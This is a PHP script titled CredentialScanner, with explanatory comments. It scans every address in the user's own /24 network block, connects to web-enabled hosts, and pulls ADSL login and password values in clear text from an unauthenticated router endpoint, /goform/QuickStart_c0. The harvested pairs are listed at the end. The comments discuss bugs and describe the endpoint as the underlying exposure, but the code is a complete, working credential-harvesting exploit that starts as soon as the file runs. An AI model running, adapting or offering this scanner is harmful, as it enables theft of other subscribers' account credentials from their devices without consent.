PHP : CredentialScanner v01
<?php
/* CONFIGURATION */
// Public-address lookup service. The scanner fetches this page unauthenticated and treats the
// first dotted-quad in the response body as its own address, so this setting decides which
// /24 the whole run operates on.
$config = [
    "ip_server" => "http://www.whatismyip.com",
];
/* END OF CONFIGURATION */
/* ------ DON'T MODIFY ANYTHING BEYOND THIS LINE IF YOU'RE NOT SURE WHAT PHP IS !!! ------- */
echo "\n\n\t*********************************************************\n".
"\t* *\n".
"\t* CredentialScanner -- (CScan v.01) *\n".
"\t* -- The automatic way to find adsl account credentials *\n".
"\t* *\n".
"\t* Brought to you by the power of the wired ! *\n".
"\t* *\n".
"\t*********************************************************\n\n\n";
// Resolves the scanner's public address as seen from the internet (hence "even through a
// gateway device"): opens $server, reads the first 200 bytes of the response and returns the
// first dotted-quad found in them. Capture group 1 spans the whole pattern, so $ip[1] is the
// full match.
// Returns the address as a string on success, otherwise an int code for handle_error():
//   1 - fopen($server) failed (the warning is hidden by @, so the cause is never shown),
//   2 - no dotted-quad appeared in the first 200 bytes (also on a PCRE error, since
//       preg_match() then returns false).
// The handle is never closed on either path. The address is taken on trust from an
// unauthenticated HTTP body -- whatever dotted-quad the page prints first wins -- and every
// later target of the run is derived from it.
function getLocalIP($server){
echo "connecting to ".$server." ...\n";
$handle = @fopen($server,"r");
if($handle){
// Only 200 bytes are inspected; an address further into the page is not seen (code 2).
$content = fread($handle,200);
// Each octet is 0-255 (leading zeros tolerated). The pattern is unanchored, so any
// dotted-quad in the HTML counts, not necessarily the visitor's address.
$val = preg_match("`((((1|0)?[0-9]{1,2}|25[0-5]|2[0-4][0-9])\.){3}((1|0)?[0-9]{1,2}|25[0-5]|2[0-4][0-9]))`",$content,$ip);
if(!$val){
return 2;
}else{
echo "fetching data ...\n";
return $ip[1];
}
}else{
return 1;
}
}
// Drops the last dotted octet from $ip, giving the /24 prefix the rest of the script calls
// the "c class" (e.g. "192.168.1.10" -> "192.168.1"). The input is not validated: a string
// without any dot yields "".
function c_class($ip){
    $octets = explode(".", $ip);
    array_pop($octets);
    return implode(".", $octets);
}
// Accepts only a bare host: optional http/https/ftp scheme, optional "www.", one hyphenated
// alphanumeric label and a 2-3 letter TLD. Paths, ports, query strings, longer TLDs and IP
// literals are all rejected, so "valid" is a narrow notion here. Returns a bool.
function validate_url($url){
    $hostPattern = "`^((http|https|ftp)://)?(www\.)?([0-9a-zA-Z]+(-[0-9a-z-A-Z]+)*)\.[a-zA-Z]{2,3}$`";
    return preg_match($hostPattern, $url) === 1;
}
// Fatal message: prints "[!!] <msg>" and terminates the script with status -1
// (shown as 255 by most shells). Never returns.
function emsg($msg){
    printf("[!!] %s\n", $msg);
    exit(-1);
}
// Non-fatal message: prints "[warning] <msg>" and lets execution continue.
function wmsg($msg){
    printf("[warning] %s\n", $msg);
}
// Informational message: an indented "-- <msg> " line padded with blank lines above and below.
function imsg($msg){
    printf("\n\t-- %s \n\n", $msg);
}
// Maps an int error code to its message and severity. Codes 1 and 2 (and any unknown code)
// go through emsg() and terminate the script; codes 3-5 only warn and return, so the caller
// keeps running after them. Callers pass the int codes returned by getLocalIP() and the
// credential fetch.
function handle_error($error){
    $fatalMessages = [
        1 => "Unable to connect to ip server",
        2 => "Unable to find any ip adress on the specified server",
    ];
    $warningMessages = [
        3 => "Invalid url for ip server [protocol://(www.)domain.ext]",
        4 => "Unable to find the credentials on the target page (honeypot???)",
        5 => "Unable to reach the target page",
    ];
    if (isset($warningMessages[$error])) {
        wmsg($warningMessages[$error]);
    } elseif (isset($fatalMessages[$error])) {
        emsg($fatalMessages[$error]);
    } else {
        emsg("Unknown error !!!");
    }
}
// Decides whether $ip is probed further: the address must have a reverse-DNS (PTR) name and
// must accept a TCP connection on port 80 within 10 seconds. gethostbyaddr() returns the
// address unchanged when there is no PTR record, so a host without reverse DNS is reported
// as "isn't alive" even if it is reachable. Every outcome is echoed to stdout; the function
// returns true only when both checks pass.
function is_alive($ip){
// @ hides lookup warnings; a result equal to $ip means no PTR record exists.
$host = @gethostbyaddr($ip);
if( $host == $ip ){
echo "target ".$ip." isn't alive\n";
return false;
}else{
echo $host." is alive, testing port 80 (http) ...\n";
// 10-second connect timeout. $errno/$errstr are filled on failure but never reported.
if( !$handle = @fsockopen($ip, 80, $errno, $errstr, 10)){
echo "target ".$ip." is not open on port 80 (http)\n";
return false;
}else{
imsg("target ".$ip." open on port 80 (http)");
// The probe connection is closed immediately; nothing is sent on it.
if($handle) @fclose($handle);
return true;
}
}
}
// Requests <$url>goform/QuickStart_c0 with no authentication, reads the whole response and
// collects every value='...' attribute whose content is [a-zA-Z0-9@]+. The first two matches
// are printed and returned as array(login, password); this assumes the page lists the
// username field before the password field (the device page itself is not shown here, so
// that ordering is an assumption of the author's, not something verifiable from this file).
// Otherwise returns an int code for handle_error():
//   4 - no value='...' attribute matched,
//   5 - the page could not be opened (the fopen() warning is hidden by @).
// Caveat: $ac[1][1] is read without checking that at least two matches exist, so a page with
// exactly one match raises an undefined-index warning.
// From the device's side this is a plain GET for /goform/QuickStart_c0 from a neighbouring
// address; a device that answers it with credentials in clear text is exactly the exposure
// this script looks for, and that endpoint not requiring authentication is the underlying issue.
function the_function_who_is_more_evil_than_the_dervish_evil_ahahaha($url){
echo "trying to get account credentials !!\n";
$handle = @fopen($url."goform/QuickStart_c0","r");
if($handle){
$buffer = "";
// Whole response is accumulated in memory, 4096 bytes per fgets() call.
while (!feof($handle)) $buffer .= fgets($handle, 4096);
fclose($handle);
// $val is the number of matches (0/false on none or PCRE error); $ac[1] holds the captured values.
$val = preg_match_all("`value='([a-zA-Z0-9@]+)'`",$buffer,$ac);
if(!$val){
return 4;
}else{
echo "\n\tcredentials : \n";
echo "\t\tLogin: ".$ac[1][0];
echo "\n\t\tPassword: ".$ac[1][1];
echo "\n\n";
return array($ac[1][0],$ac[1][1]);
}
}else{
return 5;
}
}
// Entry point. Resolves the scanner's own public address, derives the enclosing /24 (the
// script's "c class"), then walks hosts .1 through .254 of that block, skipping the scanner
// itself: each host that passes is_alive() is asked for its credentials and every successful
// array(login, password) pair is collected and listed at the end.
// Reads the global $config array for the ip_server entry.
// Error handling: codes 1 and 2 from getLocalIP() abort through handle_error(); code 3 only
// warns, so an ip_server URL that fails validate_url() is still used as-is. Per-host codes
// 4 and 5 warn and the loop moves on.
// Observable footprint per host: one PTR lookup, one TCP/80 connection attempt and one GET
// for /goform/QuickStart_c0, issued sequentially across the whole /24 from a single source.
function main(){
global $config;
if( !validate_url($config["ip_server"]) ) handle_error(3);
// PHP function names are case-insensitive, so getLocalIp() resolves to getLocalIP() above.
$ip = getLocalIp($config["ip_server"]);
if(is_int($ip)){
handle_error($ip);
}else{
imsg("your ip adress is : ".$ip);
}
$cc = c_class($ip);
echo "your c class: ".$cc."\n";
$cred = array();
// .1 to .254 inclusive; .0 and .255 are never tried.
for($i=1; $i<255; $i++):
$newip = $cc.".".$i;
if( $newip != $ip):
echo "testing if ".$newip." is alive\n";
if( is_alive($newip)):
$rep = the_function_who_is_more_evil_than_the_dervish_evil_ahahaha("http://".$newip."/");
// int => error code (4 or 5, warning only); array => array(login, password).
if( is_int($rep) ){
handle_error($rep);
}else{
$cred[] = $rep;
}
endif;
endif;
endfor;
echo "\n-------------------- Scan terminated --------------------\n";
echo "\nListing:\n";
echo "\tlogin\t\tpassword\n\n";
foreach($cred as $c):
echo "\t".$c[0]."\t".$c[1]."\n";
endforeach;
echo "\n\n\t[exiting software... entering realworld stage]\n";
}
// The scan starts as soon as the file is executed; there is no argument parsing or confirmation step.
main();
?>